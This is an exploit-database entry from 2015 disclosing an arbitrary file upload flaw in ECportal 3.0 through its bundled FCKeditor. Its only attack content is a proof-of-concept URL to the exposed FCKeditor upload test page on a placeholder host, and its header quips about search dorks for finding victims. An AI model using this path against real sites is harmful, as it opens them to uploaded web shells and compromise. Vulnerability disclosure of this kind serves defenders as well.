ECportal FCKeditor Arbitrary File Upload Vulnerability

2015-08-10T00:00:00
ID 1337DAY-ID-24017
Type zdt
Reporter Hesam Bazvand
Modified 2015-08-10T00:00:00

Description

Exploit for php platform in category web applications

# Exploit Title: ECportal FCKeditor Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: https://www.facebook.com/hesam.king73
# Homepage: http://turk-bh.ir
# Software Link: http://nomra.ir/
# Version: 3.0
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : Use Your Mind :D

*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
POC :
	http://target.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html


#  0day.today [2016-04-19]  #